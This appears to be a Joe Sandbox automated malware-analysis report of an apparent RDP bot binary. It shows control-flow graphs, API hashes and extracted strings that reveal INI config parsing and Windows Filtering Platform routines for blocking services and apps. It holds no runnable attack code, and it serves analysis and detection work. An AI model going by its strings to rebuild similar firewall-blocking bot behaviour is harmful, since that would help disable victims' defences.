                                    • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                                    • API String ID: 1423203057-2746879330
                                    • Opcode ID: e29854694c0f8539840e8829ac9a0304c53863f31d6bfdd38f35223ef1fc52e9
                                    • Instruction ID: a5b04b025db4de8cf3cfbd70045b9473ec159d1be8450e70ec71f4d00cc42f0e
                                    • Opcode Fuzzy Hash: e29854694c0f8539840e8829ac9a0304c53863f31d6bfdd38f35223ef1fc52e9
                                    • Instruction Fuzzy Hash: 27A1E862A4D68281EAA0AB02E4507B9AF60BF40784FC44133DE4DA77F1DE7CE545D323

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 700 7ff7e3ce9195-7ff7e3ce919a 701 7ff7e3ce90e4-7ff7e3ce90ec 700->701 702 7ff7e3ce8e63-7ff7e3ce8e6b 701->702 703 7ff7e3ce90f2-7ff7e3ce9109 GetProcessHeap HeapFree 701->703 704 7ff7e3ce8e72-7ff7e3ce8e82 702->704 703->702 706 7ff7e3ce8da0-7ff7e3ce8da3 704->706 707 7ff7e3ce8e88-7ff7e3ce8e8a 704->707 708 7ff7e3ce9284-7ff7e3ce9299 706->708 709 7ff7e3ce8da9-7ff7e3ce8db2 FreeLibrary 706->709 707->706 710 7ff7e3ce8e90-7ff7e3ce8eca call 7ff7e3cea1f1 707->710 709->708 710->704 713 7ff7e3ce8ecc-7ff7e3ce8f29 strlen 710->713 715 7ff7e3ce8f2f-7ff7e3ce8f5e 713->715 716 7ff7e3ce8e2e-7ff7e3ce8e49 call 7ff7e3ce14e2 713->716 720 7ff7e3ce8f64-7ff7e3ce8f8d GetProcessHeap HeapAlloc 715->720 721 7ff7e3ce8e4b-7ff7e3ce8e5e call 7ff7e3ce14e2 715->721 716->704 723 7ff7e3ce8f93-7ff7e3ce8fac 720->723 724 7ff7e3ce90a4-7ff7e3ce90c4 call 7ff7e3ce14e2 720->724 721->702 729 7ff7e3ce8fb2-7ff7e3ce9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 723->729 730 7ff7e3ce90c9-7ff7e3ce90df call 7ff7e3ce14e2 723->730 724->702 732 7ff7e3ce906d-7ff7e3ce9086 call 7ff7e3ce14e2 729->732 733 7ff7e3ce91a9-7ff7e3ce91da call 7ff7e3ce795a 729->733 730->701 741 7ff7e3ce910e-7ff7e3ce9114 732->741 742 7ff7e3ce908c 732->742 739 7ff7e3ce91ef-7ff7e3ce9205 call 7ff7e3ce14e2 733->739 740 7ff7e3ce91dc-7ff7e3ce91ea LocalFree 733->740 739->740 740->701 743 7ff7e3ce9211-7ff7e3ce9216 741->743 744 7ff7e3ce911a-7ff7e3ce9120 741->744 746 7ff7e3ce9092-7ff7e3ce909f 742->746 747 7ff7e3ce919f-7ff7e3ce91a4 742->747 743->701 748 7ff7e3ce9153-7ff7e3ce9159 744->748 749 7ff7e3ce9122-7ff7e3ce9125 744->749 746->724 747->701 751 7ff7e3ce915f-7ff7e3ce9165 748->751 752 7ff7e3ce9239-7ff7e3ce923e 748->752 753 7ff7e3ce9140-7ff7e3ce9146 749->753 754 7ff7e3ce9127-7ff7e3ce912a 749->754 755 7ff7e3ce9243-7ff7e3ce9248 751->755 756 7ff7e3ce916b-7ff7e3ce9171 751->756 752->701 759 7ff7e3ce922f-7ff7e3ce9234 753->759 760 7ff7e3ce914c-7ff7e3ce9151 753->760 757 7ff7e3ce9130-7ff7e3ce9133 754->757 758 7ff7e3ce921b-7ff7e3ce9220 754->758 755->701 761 7ff7e3ce924d-7ff7e3ce9252 756->761 762 7ff7e3ce9177-7ff7e3ce917c 756->762 763 7ff7e3ce9225-7ff7e3ce922a 757->763 764 7ff7e3ce9139-7ff7e3ce913e 757->764 758->701 759->701 760->701 761->701 762->701 763->701 764->701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                    • API String ID: 493744553-3317923414
                                    • Opcode ID: 69ac0cd501d4a87c8b17967b6e58fd6349226e74b1adf778597a72746b022cf6
                                    • Instruction ID: 06d38f1e950c56cc0d6f9927208c1bdf852734f2828d8a729f1a2e4cc69e1d0f
                                    • Opcode Fuzzy Hash: 69ac0cd501d4a87c8b17967b6e58fd6349226e74b1adf778597a72746b022cf6
                                    • Instruction Fuzzy Hash: E6517332608BC285E7B09B11E4543BAFBA0FB84744F804136C68D93BA8EF7DD549CB52

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 635 7ff7e3ce918b-7ff7e3ce9190 636 7ff7e3ce90e4-7ff7e3ce90ec 635->636 637 7ff7e3ce8e63-7ff7e3ce8e6b 636->637 638 7ff7e3ce90f2-7ff7e3ce9109 GetProcessHeap HeapFree 636->638 639 7ff7e3ce8e72-7ff7e3ce8e82 637->639 638->637 641 7ff7e3ce8da0-7ff7e3ce8da3 639->641 642 7ff7e3ce8e88-7ff7e3ce8e8a 639->642 643 7ff7e3ce9284-7ff7e3ce9299 641->643 644 7ff7e3ce8da9-7ff7e3ce8db2 FreeLibrary 641->644 642->641 645 7ff7e3ce8e90-7ff7e3ce8eca call 7ff7e3cea1f1 642->645 644->643 645->639 648 7ff7e3ce8ecc-7ff7e3ce8f29 strlen 645->648 650 7ff7e3ce8f2f-7ff7e3ce8f5e 648->650 651 7ff7e3ce8e2e-7ff7e3ce8e49 call 7ff7e3ce14e2 648->651 655 7ff7e3ce8f64-7ff7e3ce8f8d GetProcessHeap HeapAlloc 650->655 656 7ff7e3ce8e4b-7ff7e3ce8e5e call 7ff7e3ce14e2 650->656 651->639 658 7ff7e3ce8f93-7ff7e3ce8fac 655->658 659 7ff7e3ce90a4-7ff7e3ce90c4 call 7ff7e3ce14e2 655->659 656->637 664 7ff7e3ce8fb2-7ff7e3ce9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 658->664 665 7ff7e3ce90c9-7ff7e3ce90df call 7ff7e3ce14e2 658->665 659->637 667 7ff7e3ce906d-7ff7e3ce9086 call 7ff7e3ce14e2 664->667 668 7ff7e3ce91a9-7ff7e3ce91da call 7ff7e3ce795a 664->668 665->636 676 7ff7e3ce910e-7ff7e3ce9114 667->676 677 7ff7e3ce908c 667->677 674 7ff7e3ce91ef-7ff7e3ce9205 call 7ff7e3ce14e2 668->674 675 7ff7e3ce91dc-7ff7e3ce91ea LocalFree 668->675 674->675 675->636 678 7ff7e3ce9211-7ff7e3ce9216 676->678 679 7ff7e3ce911a-7ff7e3ce9120 676->679 681 7ff7e3ce9092-7ff7e3ce909f 677->681 682 7ff7e3ce919f-7ff7e3ce91a4 677->682 678->636 683 7ff7e3ce9153-7ff7e3ce9159 679->683 684 7ff7e3ce9122-7ff7e3ce9125 679->684 681->659 682->636 686 7ff7e3ce915f-7ff7e3ce9165 683->686 687 7ff7e3ce9239-7ff7e3ce923e 683->687 688 7ff7e3ce9140-7ff7e3ce9146 684->688 689 7ff7e3ce9127-7ff7e3ce912a 684->689 690 7ff7e3ce9243-7ff7e3ce9248 686->690 691 7ff7e3ce916b-7ff7e3ce9171 686->691 687->636 694 7ff7e3ce922f-7ff7e3ce9234 688->694 695 7ff7e3ce914c-7ff7e3ce9151 688->695 692 7ff7e3ce9130-7ff7e3ce9133 689->692 693 7ff7e3ce921b-7ff7e3ce9220 689->693 690->636 696 7ff7e3ce924d-7ff7e3ce9252 691->696 697 7ff7e3ce9177-7ff7e3ce917c 691->697 698 7ff7e3ce9225-7ff7e3ce922a 692->698 699 7ff7e3ce9139-7ff7e3ce913e 692->699 693->636 694->636 695->636 696->636 697->636 698->636 699->636
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                    • API String ID: 493744553-3317923414
                                    • Opcode ID: 0e94d3148b609dee0ff2560a2a89d769e9fadb2db872d082aeb89c006e5dbd4c
                                    • Instruction ID: e991e4db451810916b8586b3e360248dca809fc13ff2300b727b22a6d36fbb22
                                    • Opcode Fuzzy Hash: 0e94d3148b609dee0ff2560a2a89d769e9fadb2db872d082aeb89c006e5dbd4c
                                    • Instruction Fuzzy Hash: 4A517332608BC285E7B09B11E4543BAFBA0FB84744F804136C68D93BA8EF7DD549CB52

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 570 7ff7e3ce9181-7ff7e3ce9186 571 7ff7e3ce90e4-7ff7e3ce90ec 570->571 572 7ff7e3ce8e63-7ff7e3ce8e6b 571->572 573 7ff7e3ce90f2-7ff7e3ce9109 GetProcessHeap HeapFree 571->573 574 7ff7e3ce8e72-7ff7e3ce8e82 572->574 573->572 576 7ff7e3ce8da0-7ff7e3ce8da3 574->576 577 7ff7e3ce8e88-7ff7e3ce8e8a 574->577 578 7ff7e3ce9284-7ff7e3ce9299 576->578 579 7ff7e3ce8da9-7ff7e3ce8db2 FreeLibrary 576->579 577->576 580 7ff7e3ce8e90-7ff7e3ce8eca call 7ff7e3cea1f1 577->580 579->578 580->574 583 7ff7e3ce8ecc-7ff7e3ce8f29 strlen 580->583 585 7ff7e3ce8f2f-7ff7e3ce8f5e 583->585 586 7ff7e3ce8e2e-7ff7e3ce8e49 call 7ff7e3ce14e2 583->586 590 7ff7e3ce8f64-7ff7e3ce8f8d GetProcessHeap HeapAlloc 585->590 591 7ff7e3ce8e4b-7ff7e3ce8e5e call 7ff7e3ce14e2 585->591 586->574 593 7ff7e3ce8f93-7ff7e3ce8fac 590->593 594 7ff7e3ce90a4-7ff7e3ce90c4 call 7ff7e3ce14e2 590->594 591->572 599 7ff7e3ce8fb2-7ff7e3ce9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 593->599 600 7ff7e3ce90c9-7ff7e3ce90df call 7ff7e3ce14e2 593->600 594->572 602 7ff7e3ce906d-7ff7e3ce9086 call 7ff7e3ce14e2 599->602 603 7ff7e3ce91a9-7ff7e3ce91da call 7ff7e3ce795a 599->603 600->571 611 7ff7e3ce910e-7ff7e3ce9114 602->611 612 7ff7e3ce908c 602->612 609 7ff7e3ce91ef-7ff7e3ce9205 call 7ff7e3ce14e2 603->609 610 7ff7e3ce91dc-7ff7e3ce91ea LocalFree 603->610 609->610 610->571 613 7ff7e3ce9211-7ff7e3ce9216 611->613 614 7ff7e3ce911a-7ff7e3ce9120 611->614 616 7ff7e3ce9092-7ff7e3ce909f 612->616 617 7ff7e3ce919f-7ff7e3ce91a4 612->617 613->571 618 7ff7e3ce9153-7ff7e3ce9159 614->618 619 7ff7e3ce9122-7ff7e3ce9125 614->619 616->594 617->571 621 7ff7e3ce915f-7ff7e3ce9165 618->621 622 7ff7e3ce9239-7ff7e3ce923e 618->622 623 7ff7e3ce9140-7ff7e3ce9146 619->623 624 7ff7e3ce9127-7ff7e3ce912a 619->624 625 7ff7e3ce9243-7ff7e3ce9248 621->625 626 7ff7e3ce916b-7ff7e3ce9171 621->626 622->571 629 7ff7e3ce922f-7ff7e3ce9234 623->629 630 7ff7e3ce914c-7ff7e3ce9151 623->630 627 7ff7e3ce9130-7ff7e3ce9133 624->627 628 7ff7e3ce921b-7ff7e3ce9220 624->628 625->571 631 7ff7e3ce924d-7ff7e3ce9252 626->631 632 7ff7e3ce9177-7ff7e3ce917c 626->632 633 7ff7e3ce9225-7ff7e3ce922a 627->633 634 7ff7e3ce9139-7ff7e3ce913e 627->634 628->571 629->571 630->571 631->571 632->571 633->571 634->571
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                    • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                    • API String ID: 493744553-3317923414
                                    • Opcode ID: b835f1c21479f05cc4f62c9c6d58b6c7f059bc0905a0a235bc16e00a61526ada
                                    • Instruction ID: 7641fa4252aa7a61dd2d02f230767f8ea40159cb3ec07ac30da3a1f4113ea915
                                    • Opcode Fuzzy Hash: b835f1c21479f05cc4f62c9c6d58b6c7f059bc0905a0a235bc16e00a61526ada
                                    • Instruction Fuzzy Hash: E7517332608BC285E7B09B11E4543BAFBA0FB84744F804136C68D93BA8EF7DD549CB52

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                    • API String ID: 1004003707-3780280517
                                    • Opcode ID: 44972bb0c6209c6f17ce433e491e293207ec20daf1049f6ba9f0944a71f4938d
                                    • Instruction ID: df2d07691e31e107289425beadad6e5d04a1de34201d1caf282384b727ed9781
                                    • Opcode Fuzzy Hash: 44972bb0c6209c6f17ce433e491e293207ec20daf1049f6ba9f0944a71f4938d
                                    • Instruction Fuzzy Hash: 85414F61A8864791FAA0AB42E9107B4ABA0BF00348FD44233DB4DA76F4DF7CE555D327

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strcmp
                                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                    • API String ID: 1004003707-386092548
                                    • Opcode ID: 6e47ec395df7def9111e9242f569500123d62212d82881af74ded4e61f3f0c51
                                    • Instruction ID: d7bb5ce7ba0007ab5b191dc4a1f29cc7ede74b362d786f139ed4107c6adc5157
                                    • Opcode Fuzzy Hash: 6e47ec395df7def9111e9242f569500123d62212d82881af74ded4e61f3f0c51
                                    • Instruction Fuzzy Hash: D5418261A8855391FAA0BB41E8107B4ABA0BF00348FD44233DA0D6A5F1DF7CE555D327

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: _errno
                                    • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                    • API String ID: 2918714741-1670302297
                                    • Opcode ID: d5b82347f654392dfedf225542d4a438f2fa3c92b60559f822e1e5e0c15a5a93
                                    • Instruction ID: 110d6e81682869a742e3e3c0be2adc03cb7a01ae18e827a14f9d85458213acc1
                                    • Opcode Fuzzy Hash: d5b82347f654392dfedf225542d4a438f2fa3c92b60559f822e1e5e0c15a5a93
                                    • Instruction Fuzzy Hash: B021B432A48642CAE3A0AF15E8407A9BBA0BB44784F844133EE4C977F0CF3DD855D722

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                    • String ID: .$1
                                    • API String ID: 513531256-1839485796
                                    • Opcode ID: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
                                    • Instruction ID: 4b713902ab65686d24d4e2faecd786f9aad5c965529f66ccaf6585348c4f4057
                                    • Opcode Fuzzy Hash: 2960b9ecaab591c16170f553e21163bf5ef34305d8ef571820ba495a7a1ad153
                                    • Instruction Fuzzy Hash: 3E419425A8C64186F360BB11E8603BAEAD0BB84780FC44137DA0DA77F5CF3DE5658726

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: DestroyEnumFwpmHandle0Providerwcscmp
                                    • String ID: [E] (%s) -> FwpmProviderAdd0 failed(res=%08lx)$[E] (%s) -> FwpmProviderCreateEnumHandle0 failed(res=%08lx)$[E] (%s) -> FwpmProviderEnum0 failed(res=%08lx)$setup_filt_prov
                                    • API String ID: 1522850966-2029202777
                                    • Opcode ID: cfef6c6a482798bbc893db55c7aea54bf54562ebcb0bebf47041dad21b7195c5
                                    • Instruction ID: a01a9d7288e5f8b533721d1a6d46e64719024f3e35f9825ab8fda5baa743815b
                                    • Opcode Fuzzy Hash: cfef6c6a482798bbc893db55c7aea54bf54562ebcb0bebf47041dad21b7195c5
                                    • Instruction Fuzzy Hash: F651C836658B8184F7B0AB06F4503BAB7A6FB40780F404236DA8D57BA9EF3DD490D791
                                    APIs
                                    • FwpmEngineClose0.FWPUCLNT(?,?,?,?,?,?,00000000,0000025BBA7C14D0,?,00007FF7E3CE14B4,?,?,00000001,00007FF7E3CE14D2), ref: 00007FF7E3CE9701
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Close0EngineFwpmwcscmp
                                    • String ID: [E] (%s) -> FwpmEngineOpen0 failed(res=%08lx)$app$ip4$svc$wfp_block
                                    • API String ID: 4239307310-774261742
                                    • Opcode ID: 223170b71a83859bd236603527b02e101a1366b76761d00b77943d3fd3401860
                                    • Instruction ID: 310a482fc80e27dac9b1d955086076fb54b7b87f4ec3c94bd5663315a9b2ccdd
                                    • Opcode Fuzzy Hash: 223170b71a83859bd236603527b02e101a1366b76761d00b77943d3fd3401860
                                    • Instruction Fuzzy Hash: 6431C251B5C20341FAD0BA56A5903B99AA46F443C0FC00233EA0EE76F5DE7CD845A223
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: AttributesErrorFileLast
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                    • API String ID: 1799206407-4111913120
                                    • Opcode ID: f583ca8543be24ae3375adeba7bba2d16d38a369a885381b74c55c94ac9ca331
                                    • Instruction ID: ae6ca06cda65a8f4d7ee40f4a547b4db30b9e8477b0ba049dd71d33b5a4047ac
                                    • Opcode Fuzzy Hash: f583ca8543be24ae3375adeba7bba2d16d38a369a885381b74c55c94ac9ca331
                                    • Instruction Fuzzy Hash: D1211B51EAD44382FBF1B66AD444379D9405F0070AFE64633E11EE92F8CE3CE8A56263
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
